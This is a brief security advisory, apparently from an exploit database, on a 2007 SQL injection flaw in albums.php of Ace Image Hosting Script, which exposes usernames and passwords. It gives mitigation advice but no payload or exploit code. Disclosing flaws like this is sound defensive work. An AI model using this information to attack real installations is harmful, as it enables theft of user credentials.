Vendor: Ace Image Hosting Script
By: t0pP8uZz & xprog
CVSS: 5.5 (MEDIUM)
CWE: 89 (SQL Injection)
Product Name: Ace Image Hosting Script
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Ace Image Hosting Script SQL Injection Vulnerability
The vulnerability allows an attacker to pull users' information from the database by exploiting a SQL injection flaw in the Ace Image Hosting Script. By sending a specially crafted request to the albums.php file, an attacker can retrieve users' information, including their usernames and passwords.
Mitigation:
To mitigate this vulnerability, sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Additionally, avoid storing passwords in plaintext; use a secure hashing algorithm to store them instead.